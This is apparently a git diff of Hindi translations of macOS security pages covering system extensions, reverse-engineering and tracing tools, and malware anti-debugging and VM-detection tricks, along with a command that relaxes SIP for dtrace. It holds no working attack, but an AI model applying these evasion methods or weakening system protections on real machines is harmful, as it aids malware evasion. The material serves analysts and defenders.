DriverKit कर्नेल एक्सटेंशन का एक विकल्प है जो **हार्डवेयर समर्थन प्रदान करता है**। यह डिवाइस ड्राइवरों (जैसे USB, Serial, NIC, और HID ड्राइवर) को कर्नेल स्थान के बजाय उपयोगकर्ता स्थान में चलाने की अनुमति देता है। DriverKit ढांचा **कुछ I/O किट वर्गों के उपयोगकर्ता स्थान संस्करणों** को शामिल करता है, और कर्नेल सामान्य I/O किट घटनाओं को उपयोगकर्ता स्थान में अग्रेषित करता है, जिससे इन ड्राइवरों के चलने के लिए एक सुरक्षित वातावरण प्रदान होता है।
DriverKit कर्नेल एक्सटेंशन्स का एक विकल्प है जो **हार्डवेयर समर्थन प्रदान करता है**। यह डिवाइस ड्राइवरों (जैसे USB, Serial, NIC, और HID ड्राइवर) को कर्नेल स्थान के बजाय उपयोगकर्ता स्थान में चलाने की अनुमति देता है। DriverKit ढांचा **कुछ I/O किट वर्गों के उपयोगकर्ता स्थान संस्करणों** को शामिल करता है, और कर्नेल सामान्य I/O किट घटनाओं को उपयोगकर्ता स्थान में अग्रेषित करता है, जिससे इन ड्राइवरों के चलने के लिए एक सुरक्षित वातावरण प्रदान होता है।
### **Network एक्सटेंशन**
### **Network एक्सटेंशन्स**
Network एक्सटेंशन नेटवर्क व्यवहार को अनुकूलित करने की क्षमता प्रदान करते हैं। Network एक्सटेंशन के कई प्रकार हैं:
Network एक्सटेंशन्स नेटवर्क व्यवहार को अनुकूलित करने की क्षमता प्रदान करते हैं। Network एक्सटेंशन्स के कई प्रकार हैं:
- **App Proxy**: इसका उपयोग एक VPN क्लाइंट बनाने के लिए किया जाता है जो एक प्रवाह-आधारित, कस्टम VPN प्रोटोकॉल को लागू करता है। इसका मतलब है कि यह नेटवर्क ट्रैफ़िक को कनेक्शनों (या प्रवाहों) के आधार पर संभालता है न कि व्यक्तिगत पैकेट के आधार पर।
- **Packet Tunnel**: इसका उपयोग एक VPN क्लाइंट बनाने के लिए किया जाता है जो एक पैकेट-आधारित, कस्टम VPN प्रोटोकॉल को लागू करता है। इसका मतलब है कि यह नेटवर्क ट्रैफ़िक को व्यक्तिगत पैकेट के आधार पर संभालता है।
@ -53,11 +53,11 @@ Network एक्सटेंशन नेटवर्क व्यवहार
- **EndpointSecurityDriverClient**: इसके लिए `com.apple.private.endpoint-security.manager` अधिकार की आवश्यकता होती है, जो केवल सिस्टम प्रक्रिया `endpointsecurityd` के पास होता है।
- **EndpointSecurityExternalClient**: इसके लिए `com.apple.developer.endpoint-security.client` अधिकार की आवश्यकता होती है। इसका उपयोग आमतौर पर तीसरे पक्ष के सुरक्षा सॉफ़्टवेयर द्वारा किया जाएगा जिसे एंडपॉइंट सुरक्षा ढांचे के साथ बातचीत करने की आवश्यकता होती है।
एंडपॉइंट सुरक्षा एक्सटेंशन:**`libEndpointSecurity.dylib`** वह C लाइब्रेरी है जिसका उपयोग सिस्टम एक्सटेंशन कर्नेल के साथ संवाद करने के लिए करत हैं। यह लाइब्रेरी एंडपॉइंट सुरक्षा KEXT के साथ संवाद करने के लिए I/O किट (`IOKit`) का उपयोग करती है।
एंडपॉइंट सुरक्षा एक्सटेंशन्स:**`libEndpointSecurity.dylib`** वह C लाइब्रेरी है जिसका उपयोग सिस्टम एक्सटेंशन्स कर्नेल के साथ संवाद करने के लिए करत हैं। यह लाइब्रेरी एंडपॉइंट सुरक्षा KEXT के साथ संवाद करने के लिए I/O किट (`IOKit`) का उपयोग करती है।
**`endpointsecurityd`** एक प्रमुख सिस्टम डेमॉन है जो एंडपॉइंट सुरक्षा सिस्टम एक्सटेंशनों का प्रबंधन और लॉन्च करने में शामिल है, विशेष रूप से प्रारंभिक बूट प्रक्रिया के दौरान। **केवल सिस्टम एक्सटेंशन** जिन्हें उनके `Info.plist` फ़ाइल में **`NSEndpointSecurityEarlyBoot`** के रूप में चिह्नित किया गया है, इस प्रारंभिक बूट उपचार को प्राप्त करते हैं।
**`endpointsecurityd`** एक प्रमुख सिस्टम डेमॉन है जो एंडपॉइंट सुरक्षा सिस्टम एक्सटेंशन्स का प्रबंधन और लॉन्च करने में शामिल है, विशेष रूप से प्रारंभिक बूट प्रक्रिया के दौरान। **केवल सिस्टम एक्सटेंशन्स** जिन्हें उनके `Info.plist` फ़ाइल में **`NSEndpointSecurityEarlyBoot`** के रूप में चिह्नित किया गया है, इस प्रारंभिक बूट उपचार को प्राप्त करते हैं।
एक अन्य सिस्टम डेमॉन, **`sysextd`**, **सिस्टम एक्सटेंशनों को मान्य करता है** और उन्हें उचित सिस्टम स्थानों में स्थानांतरित करता है। फिर यह संबंधित डेमॉन से एक्सटेंशन को लोड करने के लिए कहता है। **`SystemExtensions.framework`** सिस्टम एक्सटेंशनों को सक्रिय और निष्क्रिय करने के लिए जिम्मेदार है।
एक अन्य सिस्टम डेमॉन, **`sysextd`**, **सिस्टम एक्सटेंशन्स को मान्य करता है** और उन्हें उचित सिस्टम स्थानों में स्थानांतरित करता है। फिर यह संबंधित डेमॉन से एक्सटेंशन को लोड करने के लिए कहता है। **`SystemExtensions.framework`** सिस्टम एक्सटेंशन्स को सक्रिय और निष्क्रिय करने के लिए जिम्मेदार है।
## ESF को बायपास करना

80
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View File

@ -33,7 +33,7 @@ ARCH=arm64e disarm -c -S /path/bin # Get symbols (func names, strings...)
ARCH=arm64e disarm -c -d /path/bin # Get disasembled
jtool2 -d __DATA.__const myipc_server | grep MIG # Get MIG info
```
आप [**यहाँ jtool2 डाउनलोड कर सकते हैं**](http://www.newosxbook.com/tools/jtool.html) या इसे `brew` के साथ इंस्टॉल कर सकते हैं।
आप [**jtool2 यहाँ डाउनलोड कर सकते हैं**](http://www.newosxbook.com/tools/jtool.html) या इसे `brew` के साथ इंस्टॉल कर सकते हैं।
```bash
# Install
brew install --cask jtool2
@ -50,7 +50,7 @@ ARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Autom
# Get MIG information
jtool2 -d __DATA.__const myipc_server | grep MIG
```
> [!CAUTION] > **jtool का उपयोग बंद कर दिया गया है और disarm का उपयोग किया जाना चाहिए**
> [!CAUTION] > **jtool का उपयोग बंद कर दिया गया है disarm के पक्ष में**
### Codesign / ldid
@ -84,11 +84,11 @@ ldid -S/tmp/entl.xml <binary>
### SuspiciousPackage
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) एक उपकरण है जो **.pkg** फ़ाइलों (इंस्टॉलर) की जांच करने के लिए उपयोगी है और इसे स्थापित करने से पहले इसके अंदर क्या है, यह देखने के लिए।\
इन इंस्टॉलरों में `preinstall` और `postinstall` बैश स्क्रिप्ट होती हैं जिन्हें मैलवेयर लेखक आमतौर पर **persist** **the** **malware** के लिए दुरुपयोग करते हैं।
इन इंस्टॉलरों में `preinstall` और `postinstall` बैश स्क्रिप्ट होती हैं जिनका उपयोग आमतौर पर मैलवेयर लेखक **persist** **the** **malware** के लिए करते हैं।
### hdiutil
यह उपकरण Apple डिस्क इमेज (**.dmg**) फ़ाइलों को **mount** करने की अनुमति देता है ताकि उन्हें कुछ चलाने से पहले जांचा जा सके:
यह उपकरण Apple डिस्क इमेज (**.dmg**) फ़ाइलों को **mount** करने की अनुमति देता है ताकि उन्हें चलाने से पहले जांचा जा सके:
```bash
hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
```
@ -105,7 +105,7 @@ hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
### मेटाडेटा
> [!CAUTION]
> ध्यान दें कि Objective-C में लिखे गए प्रोग्राम **क्लास डिक्लेरेशन को बनाए रखते हैं** **जब** **कंपाइल** किया जाता है [Mach-O बाइनरी में](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)। ऐसे क्लास डिक्लेरेशन **शामिल** करते हैं:
> ध्यान दें कि Objective-C में लिखे गए प्रोग्राम **क्लास डिक्लेरेशन को बनाए रखते हैं** **जब** **कंपाइल** किया जाता है [Mach-O बाइनरी में](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)। ऐसे क्लास डिक्लेरेशन **में शामिल हैं**:
- परिभाषित इंटरफेस
- इंटरफेस विधियाँ
@ -122,7 +122,7 @@ hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
इस फ़ंक्शन की अपेक्षित पैरामीटर हैं:
- पहला पैरामीटर (**self**) "एक पॉइंटर है जो **क्लास के इंस्टेंस की ओर इशारा करता है जो संदेश प्राप्त करने वाला है**"। या सरल शब्दों में, यह वह ऑब्जेक्ट है जिस पर विधि को लागू किया जा रहा है। यदि विधि एक क्लास विधि है, तो यह क्लास ऑब्जेक्ट का एक इंस्टेंस होगा (जैसे पूरा), जबकि एक इंस्टेंस विधि के लिए, self क्लास के एक इंस्टेंस को ऑब्जेक्ट के रूप में इंगित करेगा।
- पहला पैरामीटर (**self**) "एक पॉइंटर है जो **क्लास के इंस्टेंस की ओर इशारा करता है जो संदेश प्राप्त करने वाला है**"। या सरल शब्दों में, यह वह ऑब्जेक्ट है जिस पर विधि को लागू किया जा रहा है। यदि विधि एक क्लास विधि है, तो यह क्लास ऑब्जेक्ट का एक इंस्टेंस होगा (जैसे पूरा), जबकि एक इंस्टेंस विधि के लिए, self क्लास के एक इंस्टेंस के रूप में एक ऑब्जेक्ट की ओर इशारा करेगा।
- दूसरा पैरामीटर, (**op**), "विधि का चयनकर्ता है जो संदेश को संभालता है"। फिर से, सरल शब्दों में, यह बस **विधि का नाम है।**
- शेष पैरामीटर वे **मान हैं जो विधि द्वारा आवश्यक हैं** (op)।
@ -136,7 +136,7 @@ x64:
| **आर्गुमेंट** | **रजिस्टर** | **(के लिए) objc_msgSend** |
| ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ |
| **1st आर्गुमेंट** | **rdi** | **self: वह ऑब्जेक्ट जिस पर विधि लागू की जा रही है** |
| **1st आर्गुमेंट** | **rdi** | **self: वह ऑब्जेक्ट जिस पर विधि को लागू किया जा रहा है** |
| **2nd आर्गुमेंट** | **rsi** | **op: विधि का नाम** |
| **3rd आर्गुमेंट** | **rdx** | **विधि के लिए 1st आर्गुमेंट** |
| **4th आर्गुमेंट** | **rcx** | **विधि के लिए 2nd आर्गुमेंट** |
@ -191,7 +191,7 @@ Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd
Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture
[...]
```
आप इस अनुभाग में संग्रहीत [**जानकारी के बारे में और जानकारी इस ब्लॉग पोस्ट में पा सकते हैं**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html)।
आप इस [**ब्लॉग पोस्ट में इन अनुभागों में संग्रहीत जानकारी**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html) के बारे में और जानकारी प्राप्त कर सकते हैं
इसके अलावा, **Swift बाइनरी में प्रतीक हो सकते हैं** (उदाहरण के लिए पुस्तकालयों को प्रतीकों को संग्रहीत करने की आवश्यकता होती है ताकि उनके कार्यों को कॉल किया जा सके)। **प्रतीकों में आमतौर पर कार्य का नाम** और विशेषता के बारे में जानकारी होती है, इसलिए वे बहुत उपयोगी होते हैं और ऐसे "**डेमैंग्लर्स"** होते हैं जो मूल नाम प्राप्त कर सकते हैं:
```bash
@ -222,7 +222,7 @@ macOS कुछ दिलचस्प APIs को उजागर करता
### Sysdiagnose
यह उपकरण (`/usr/bini/ysdiagnose`) मूल रूप से आपके कंप्यूटर से बहुत सारी जानकारी एकत्र करता है, जैसे कि `ps`, `zprint`... जैसे दर्जनों विभिन्न आदेशों को निष्पादित करता है।
यह उपकरण (`/usr/bini/ysdiagnose`) मूल रूप से आपके कंप्यूटर से बहुत सारी जानकारी एकत्र करता है, जिसमें `ps`, `zprint` जैसे दर्जनों विभिन्न कमांड चलाना शामिल है...
इसे **रूट** के रूप में चलाना आवश्यक है और डेमन `/usr/libexec/sysdiagnosed` के पास बहुत दिलचस्प अधिकार हैं जैसे `com.apple.system-task-ports` और `get-task-allow`
@ -236,13 +236,13 @@ macOS कुछ दिलचस्प APIs को उजागर करता
MacOS बहुत सारे लॉग उत्पन्न करता है जो एक एप्लिकेशन चलाते समय **यह समझने में बहुत उपयोगी हो सकते हैं कि यह क्या कर रहा है**
इसके अलावा, कुछ लॉग्स में `<private>` टैग होगा ताकि कुछ **उपयोगकर्ता** या **कंप्यूटर** **पहचानने योग्य** जानकारी को **छिपाया** जा सके। हालाँकि, इस जानकारी को प्रकट करने के लिए **एक प्रमाणपत्र स्थापित करना संभव है**। [**यहाँ**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log) से स्पष्टीकरण का पालन करें।
इसके अलावा, कुछ लॉग्स में `<private>` टैग होगा ताकि कुछ **उपयोगकर्ता** या **कंप्यूटर** **पहचान योग्य** जानकारी को **छिपाया** जा सके। हालाँकि, इस जानकारी को प्रकट करने के लिए **एक प्रमाणपत्र स्थापित करना संभव है**। [**यहाँ**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log) से स्पष्टीकरण का पालन करें।
### हॉप्पर
#### बाईं पैनल
हॉप्पर के बाईं पैनल में बाइनरी के प्रतीक (**लेबल**) देखना संभव है, प्रक्रियाओं और कार्यों की सूची (**प्रोक**) और स्ट्रिंग्स (**स्ट्र**)। ये सभी स्ट्रिंग्स नहीं हैं बल्कि वे हैं जो Mac-O फ़ाइल के कई भागों में परिभाषित हैं (जैसे _cstring या_ `objc_methname`)।
हॉप्पर के बाईं पैनल में बाइनरी के प्रतीक (**Labels**), प्रक्रियाओं और कार्यों की सूची (**Proc**) और स्ट्रिंग्स (**Str**) देखी जा सकती हैं। ये सभी स्ट्रिंग्स नहीं हैं बल्कि वे हैं जो Mac-O फ़ाइल के कई भागों में परिभाषित हैं (जैसे _cstring या_ `objc_methname`)।
#### मध्य पैनल
@ -250,7 +250,7 @@ MacOS बहुत सारे लॉग उत्पन्न करता ह
<figure><img src="../../../images/image (343).png" alt=""><figcaption></figcaption></figure>
कोड ऑब्जेक्ट पर राइट-क्लिक करके आप **उस ऑब्जेक्ट के लिए संदर्भ** देख सकते हैं या यहां तक कि इसका नाम बदल सकते हैं (यह डी-कंपाइल किए गए प्सेडोकोड में काम नहीं करता):
कोड ऑब्जेक्ट पर राइट-क्लिक करने पर आप **उस ऑब्जेक्ट के लिए संदर्भ** देख सकते हैं या यहां तक कि इसका नाम बदल सकते हैं (यह डी-कंपाइल किए गए प्सेडोकोड में काम नहीं करता):
<figure><img src="../../../images/image (1117).png" alt=""><figcaption></figcaption></figure>
@ -258,7 +258,7 @@ MacOS बहुत सारे लॉग उत्पन्न करता ह
#### दाईं पैनल
दाईं पैनल में आप दिलचस्प जानकारी देख सकते हैं जैसे **नेविगेशन इतिहास** (ताकि आप जान सकें कि आप वर्तमान स्थिति में कैसे पहुंचे), **कॉल ग्राफ** जहां आप देख सकते हैं सभी **कार्य जो इस कार्य को कॉल करते हैं** और सभी कार्य जो **यह कार्य कॉल करता है**, और **स्थानीय चर** की जानकारी।
दाईं पैनल में आप दिलचस्प जानकारी देख सकते हैं जैसे **नेविगेशन इतिहास** (ताकि आप जान सकें कि आप वर्तमान स्थिति पर कैसे पहुंचे), **कॉल ग्राफ** जहां आप देख सकते हैं सभी **कार्य जो इस कार्य को कॉल करते हैं** और सभी कार्य जो **यह कार्य कॉल करता है**, और **स्थानीय चर** की जानकारी।
### डीट्रैस
@ -267,7 +267,7 @@ MacOS बहुत सारे लॉग उत्पन्न करता ह
DTrace प्रत्येक सिस्टम कॉल के लिए एक प्रोब बनाने के लिए **`dtrace_probe_create`** फ़ंक्शन का उपयोग करता है। ये प्रोब्स प्रत्येक सिस्टम कॉल के **प्रवेश और निकास बिंदु** में फायर किए जा सकते हैं। DTrace के साथ इंटरैक्शन /dev/dtrace के माध्यम से होता है जो केवल रूट उपयोगकर्ता के लिए उपलब्ध है।
> [!TIP]
> SIP सुरक्षा को पूरी तरह से अक्षम किए बिना Dtrace को सक्षम करने के लिए आप रिकवरी मोड में निष्पादित कर सकते हैं: `csrutil enable --without dtrace`
> Dtrace को पूरी तरह से SIP सुरक्षा को अक्षम किए बिना सक्षम करने के लिए आप रिकवरी मोड में निष्पादित कर सकते हैं: `csrutil enable --without dtrace`
>
> आप **`dtrace`** या **`dtruss`** बाइनरी भी कर सकते हैं जो **आपने संकलित की हैं**
@ -281,7 +281,7 @@ ID PROVIDER MODULE FUNCTION NAME
43 profile profile-97
44 profile profile-199
```
प्रोब नाम चार भागों में बंटा होता है: प्रदाता, मॉड्यूल, फ़ंक्शन, और नाम (`fbt:mach_kernel:ptrace:entry`)। यदि आप नाम के किसी भाग को निर्दिष्ट नहीं करते हैं, तो Dtrace उस भाग को वाइल्डकार्ड के रूप में लागू करेगा।
प्रोब नाम चार भागों में बंटा होता है: प्रदाता, मॉड्यूल, फ़ंक्शन, और नाम (`fbt:mach_kernel:ptrace:entry`)। यदि आप नाम के कुछ भाग को निर्दिष्ट नहीं करते हैं, तो Dtrace उस भाग को वाइल्डकार्ड के रूप में लागू करेगा।
DTrace को प्रोब्स को सक्रिय करने और जब वे फायर होते हैं तो कौन से क्रियाएँ करनी हैं, यह निर्दिष्ट करने के लिए, हमें D भाषा का उपयोग करने की आवश्यकता होगी।
@ -339,33 +339,7 @@ dtruss -c -p 1000 #get syscalls of PID 1000
```
### kdebug
यह एक कर्नेल ट्रेसिंग सुविधा है। दस्तावेज़ित कोड **`/usr/share/misc/trace.codes`** में पाए जा सकते हैं।
`latency`, `sc_usage`, `fs_usage` और `trace` जैसे उपकरण इसका आंतरिक रूप से उपयोग करते हैं।
`kdebug` के साथ इंटरफेस करने के लिए `sysctl` का उपयोग `kern.kdebug` नामस्थान पर किया जाता है और उपयोग करने के लिए MIBs `sys/sysctl.h` में पाए जा सकते हैं जिसमें कार्य `bsd/kern/kdebug.c` में लागू किए गए हैं।
कस्टम क्लाइंट के साथ kdebug के साथ इंटरैक्ट करने के लिए ये आमतौर पर कदम होते हैं:
- KERN_KDSETREMOVE के साथ मौजूदा सेटिंग्स को हटाएं
- KERN_KDSETBUF और KERN_KDSETUP के साथ ट्रेस सेट करें
- बफर प्रविष्टियों की संख्या प्राप्त करने के लिए KERN_KDGETBUF का उपयोग करें
- KERN_KDPINDEX के साथ ट्रेस से अपने क्लाइंट को प्राप्त करें
- KERN_KDENABLE के साथ ट्रेसिंग सक्षम करें
- KERN_KDREADTR को कॉल करके बफर पढ़ें
- प्रत्येक थ्रेड को उसके प्रोसेस से मेल करने के लिए KERN_KDTHRMAP को कॉल करें।
इस जानकारी को प्राप्त करने के लिए Apple उपकरण **`trace`** या कस्टम उपकरण [kDebugView (kdv)](https://newosxbook.com/tools/kdv.html)** का उपयोग करना संभव है।**
**ध्यान दें कि Kdebug केवल एक ग्राहक के लिए एक समय में उपलब्ध है।** इसलिए एक समय में केवल एक k-debug संचालित उपकरण चलाया जा सकता है।
### ktrace
`ktrace_*` APIs `libktrace.dylib` से आती हैं जो `Kdebug` के उन पर लपेटती हैं। फिर, एक क्लाइंट बस `ktrace_session_create` और `ktrace_events_[single/class]` को कॉल कर सकता है ताकि विशिष्ट कोड पर कॉलबैक सेट कर सके और फिर `ktrace_start` के साथ इसे शुरू कर सके।
आप इसे **SIP सक्रिय होने पर भी** उपयोग कर सकते हैं।
आप क्लाइंट के रूप में उपयोगिता `ktrace` का उपयोग कर सकते हैं:
यह एक कर्नेल ट्रेसिंग सुविधा है। दस्तावेज़ित कोड **`/usr/share/misc/trace.codes`
```bash
ktrace trace -s -S -t c -c ls | grep "ls("
```
@ -375,7 +349,7 @@ ktrace trace -s -S -t c -c ls | grep "ls("
यह कर्नेल स्तर की प्रोफाइलिंग करने के लिए उपयोग किया जाता है और इसे `Kdebug` कॉलआउट्स का उपयोग करके बनाया गया है।
बुनियादी रूप से, वैश्विक चर `kernel_debug_active` की जांच की जाती है और इसे सेट किया जाता है, यह `kperf_kdebug_handler` को `Kdebug` कोड और कर्नेल फ्रेम के पते के साथ कॉल करता है। यदि `Kdebug` कोड में से एक चयनित के साथ मेल खाता है, तो इसे एक बिटमैप के रूप में "क्रियाएँ" कॉन्फ़िगर की जाती हैं (विकल्पों के लिए `osfmk/kperf/action.h` देखें)।
बुनियादी रूप से, वैश्विक चर `kernel_debug_active` की जांच की जाती है और यदि यह सेट है तो यह `kperf_kdebug_handler` को `Kdebug` कोड और कर्नेल फ्रेम के पते के साथ कॉल करता है। यदि `Kdebug` कोड में से एक चयनित के साथ मेल खाता है, तो इसे "क्रियाएँ" के रूप में एक बिटमैप के रूप में कॉन्फ़िगर किया जाता है (विकल्पों के लिए `osfmk/kperf/action.h` देखें)।
Kperf का एक sysctl MIB तालिका भी है: (रूट के रूप में) `sysctl kperf`। ये कोड `osfmk/kperf/kperfbsd.c` में पाए जा सकते हैं।
@ -383,12 +357,12 @@ Kperf का एक sysctl MIB तालिका भी है: (रूट क
### ProcessMonitor
[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) एक बहुत उपयोगी उपकरण है जो यह जांचने के लिए है कि एक प्रक्रिया कौन-कौन स क्रियाएँ कर रही है (उदाहरण के लिए, यह मॉनिटर करें कि एक प्रक्रिया कौन-कौन से नए प्रक्रियाएँ बना रही है)।
[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) एक बहुत उपयोगी उपकरण है जो यह जांचने के लिए है कि एक प्रक्रिया कौन-कौन स क्रियाएँ कर रही है (उदाहरण के लिए, यह मॉनिटर करें कि एक प्रक्रिया कौन-कौन से नए प्रक्रियाएँ बना रही है)।
### SpriteTree
[**SpriteTree**](https://themittenmac.com/tools/) एक उपकरण है जो प्रक्रियाओं के बीच संबंधों को प्रिंट करता है।\
आपको अपने मैक को एक कमांड के साथ मॉनिटर करना होगा जैसे **`sudo eslogger fork exec rename create > cap.json`** (इसकी आवश्यकता के लिए टर्मिनल को FDA लॉन्च करना आवश्यक है)। और फिर आप इस उपकरण में json लोड कर सकते हैं ताकि सभी संबंधों को देख सकें:
आपको अपने मैक को एक कमांड के साथ मॉनिटर करना होगा जैसे **`sudo eslogger fork exec rename create > cap.json`** (इसकी आवश्यकता के लिए टर्मिनल को FDA लॉन्च करना होगा)। और फिर आप इस उपकरण में json लोड कर सकते हैं ताकि सभी संबंधों को देख सकें:
<figure><img src="../../../images/image (1182).png" alt="" width="375"><figcaption></figcaption></figure>
@ -398,11 +372,11 @@ Kperf का एक sysctl MIB तालिका भी है: (रूट क
### Crescendo
[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) एक GUI उपकरण है जिसका रूप और अनुभव Windows उपयोगकर्ताओं को Microsoft Sysinternal के _Procmon_ से परिचित हो सकता है। यह उपकरण विभिन्न प्रकार की घटनाओं के रिकॉर्डिंग को शुरू और बंद करने की अनुमति देता है, इन घटनाओं को फ़ाइल, प्रक्रिया, नेटवर्क आदि जैसी श्रेणियों द्वारा फ़िल्टर करने की अनुमति देता है, और json प्रारूप में रिकॉर्ड की गई घटनाओं को सहेजने की कार्यक्षमता प्रदान करता है।
[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) एक GUI उपकरण है जिसका रूप और अनुभव Windows उपयोगकर्ताओं को Microsoft Sysinternal के _Procmon_ से परिचित हो सकता है। यह उपकरण विभिन्न प्रकार की घटनाओं के रिकॉर्डिंग को शुरू और रोकने की अनुमति देता है, इन घटनाओं को फ़ाइल, प्रक्रिया, नेटवर्क आदि जैसी श्रेणियों द्वारा फ़िल्टर करने की अनुमति देता है, और json प्रारूप में रिकॉर्ड की गई घटनाओं को सहेजने की कार्यक्षमता प्रदान करता है।
### Apple Instruments
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) Xcode के डेवलपर उपकरणों का हिस्सा हैं - जो एप्लिकेशन प्रदर्शन की निगरानी, मेमोरी लीक की पहचान और फ़ाइल सिस्टम गतिविधि को ट्रैक करने के लिए उपयोग किए जाते हैं।
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) Xcode के डेवलपर उपकरणों का हिस्सा हैं - जो अनुप्रयोग प्रदर्शन की निगरानी, मेमोरी लीक की पहचान और फ़ाइल सिस्टम गतिविधि को ट्रैक करने के लिए उपयोग किए जाते हैं।
![](<../../../images/image (1138).png>)
@ -456,12 +430,12 @@ settings set target.x86-disassembly-flavor intel
- कमांड **`sysctl hw.model`** "Mac" लौटाता है जब **होस्ट MacOS है** लेकिन जब यह एक VM है तो कुछ अलग लौटाता है।
- **`hw.logicalcpu`** और **`hw.physicalcpu`** के मानों के साथ खेलते हुए कुछ मैलवेयर यह पहचानने की कोशिश करते हैं कि क्या यह एक VM है।
- कुछ मैलवेयर यह भी **पहचान सकते हैं** कि मशीन **VMware** आधारित है या नहीं, MAC पते (00:50:56) के आधार पर।
- यह भी संभव है कि **यदि एक प्रक्रिया को डीबग किया जा रहा है** तो इसे एक साधारण कोड के साथ जांचा जा सके:
- कुछ मैलवेयर यह भी **पहचान सकते हैं** कि मशीन **VMware** आधारित है या नहीं MAC पते (00:50:56) के आधार पर।
- यह भी संभव है कि **यदि एक प्रक्रिया को डीबग किया जा रहा है** तो इसे एक साधारण कोड के साथ जांचा जा सके जैसे:
- `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //प्रक्रिया को डीबग किया जा रहा है }`
- यह **`ptrace`** सिस्टम कॉल को **`PT_DENY_ATTACH`** फ्लैग के साथ भी कॉल कर सकता है। यह **डीबग** करने वाले को अटैच और ट्रेस करने से रोकता है।
- आप जांच सकते हैं कि **`sysctl`** या **`ptrace`** फ़ंक्शन को **आयात** किया जा रहा है (लेकिन मैलवेयर इसे डायनामिक रूप से आयात कर सकता है)
- जैसा कि इस लेख में उल्लेख किया गया है, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
- जैसा कि इस लेख में नोट किया गया है, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
“_संदेश प्रक्रिया # समाप्त हो गई **स्थिति = 45 (0x0000002d)** आमतौर पर यह एक संकेत है कि डीबग लक्ष्य **PT_DENY_ATTACH** का उपयोग कर रहा है_”
## कोर डंप
@ -470,7 +444,7 @@ settings set target.x86-disassembly-flavor intel
- `kern.coredump` sysctl 1 पर सेट है (डिफ़ॉल्ट रूप से)
- यदि प्रक्रिया suid/sgid नहीं थी या `kern.sugid_coredump` 1 है (डिफ़ॉल्ट रूप से 0)
- `AS_CORE` सीमा ऑपरेशन की अनुमति देती है। कोड डंप निर्माण को दबाने के लिए `ulimit -c 0` कॉल करके और उन्हें फिर से सक्षम करने के लिए `ulimit -c unlimited` का उपयोग किया जा सकता है।
- `AS_CORE` सीमा ऑपरेशन की अनुमति देती है। कोड डंप निर्माण को दबाने के लिए `ulimit -c 0` कॉल करके और उन्हें फिर से सक्षम करने के लिए `ulimit -c unlimited` का उपयोग करना संभव है।
इन मामलों में कोर डंप `kern.corefile` sysctl के अनुसार उत्पन्न होते हैं और आमतौर पर `/cores/core/.%P` में संग्रहीत होते हैं।
@ -479,8 +453,8 @@ settings set target.x86-disassembly-flavor intel
### [ReportCrash](https://ss64.com/osx/reportcrash.html)
ReportCrash **क्रैश होने वाली प्रक्रियाओं का विश्लेषण करता है और डिस्क पर एक क्रैश रिपोर्ट सहेजता है**। एक क्रैश रिपोर्ट में ऐसी जानकारी होती है जो **डेवलपर को क्रैश के कारण का निदान करने में मदद कर सकती है**।\
प्रयोगकर्ताओं के लिए **per-user launchd संदर्भ में चलने वाली** अनुप्रयोगों और अन्य प्रक्रियाओं के लिए, ReportCrash एक LaunchAgent के रूप में चलता है और उपयोगकर्ता के `~/Library/Logs/DiagnosticReports/` में क्रैश रिपोर्ट सहेजता है।\
डेमन्स, सिस्टम लॉन्चड संदर्भ में चलने वाली अन्य प्रक्रियाओं और अन्य विशेषाधिकार प्राप्त प्रक्रियाओं के लिए, ReportCrash एक LaunchDaemon के रूप में चलता है और सिस्टम के `/Library/Logs/DiagnosticReports` में क्रैश रिपोर्ट सहेजता है।
उपयोगकर्ता के लॉन्चड संदर्भ में **चलने वाली अनुप्रयोगों और अन्य प्रक्रियाओं** के लिए, ReportCrash एक LaunchAgent के रूप में चलता है और उपयोगकर्ता के `~/Library/Logs/DiagnosticReports/` में क्रैश रिपोर्ट सहेजता है।\
डेमन्स, सिस्टम लॉन्चड संदर्भ में **चलने वाली अन्य प्रक्रियाओं** और अन्य विशेषाधिकार प्राप्त प्रक्रियाओं के लिए, ReportCrash एक LaunchDaemon के रूप में चलता है और सिस्टम के `/Library/Logs/DiagnosticReports` में क्रैश रिपोर्ट सहेजता है।
यदि आप क्रैश रिपोर्टों के बारे में चिंतित हैं **जो Apple को भेजी जा रही हैं** तो आप उन्हें अक्षम कर सकते हैं। यदि नहीं, तो क्रैश रिपोर्टें **यह पता लगाने में सहायक हो सकती हैं कि सर्वर कैसे क्रैश हुआ**
```bash

144
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
View File

@ -4,7 +4,7 @@
## **अपवाद स्तर - EL (ARM64v8)**
ARMv8 आर्किटेक्चर में, निष्पादन स्तर, जिसे अपवाद स्तर (ELs) के रूप में जाना जाता है, निष्पादन वातावरण के विशेषाधिकार स्तर और क्षमताओं को परिभाषित करता है। चार अपवाद स्तर हैं, जो EL0 से EL3 तक हैं, प्रत्येक का एक अलग उद्देश्य है:
